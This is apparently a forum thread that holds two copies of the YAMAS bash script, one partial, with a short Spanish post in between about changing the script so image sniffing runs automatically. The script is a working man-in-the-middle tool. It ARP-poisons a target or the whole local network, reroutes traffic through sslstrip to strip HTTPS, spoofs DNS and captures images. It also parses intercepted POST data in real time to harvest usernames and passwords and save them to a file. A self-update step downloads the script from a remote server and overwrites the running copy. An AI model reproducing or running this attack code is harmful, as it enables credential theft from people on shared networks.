if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir #create if needed
fi
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
echo -e "Would you rather use driftnet (display images) or tcpxtract ?
1. Tcpxtract (saves all images to $log_output_dir/capture[date])
2. Driftnet (Display images on screen and save all images to $log_output_dir/capture[date])"
read image_choice
case $image_choice in
1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
drifton=2
echo "tcpxtract is launched with pid $tcpid"
misc ;;
2) driftnet -i $iface -d $log_output_dir &> /dev/null &
drifton=1
echo "Driftnet launched."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]
-
bueno , pues ya lo tengo.
las capturas van a /root/driftnet/capeta_fecha-captura >:(
he eliminado del menu la opcion de selccion entre driftnet o el otro snifer ,....y he autoseleccionado driftnet
con lo que al darle a opcion 5 ...aparece el menu de añadidos, en el que aparece
image snifing
es seleccionar esa opcion , et voila..nada mas que hacer..es decir ..antes elegias esa opcion y te preguntaba que esnifer lanzar..ahora ya lo hace todo automatico. >:( >:( >:(
he usado la orden que puso geminis_demon y despues ajuste la ruta de captura y modifique la opcion de image capturing.
code
[spoiler]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir #create if needed
fi
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
echo -e "Would you rather use driftnet (display images) or tcpxtract ?
1. Tcpxtract (saves all images to $log_output_dir/capture[date])
2. Driftnet (Display images on screen and save all images to $log_output_dir/capture[date])"
read image_choice
case $image_choice in
1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
drifton=2
echo "tcpxtract is launched with pid $tcpid"
misc ;;
2) driftnet -i $iface -d $log_output_dir &> /dev/null &
drifton=1
echo "Driftnet launched."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
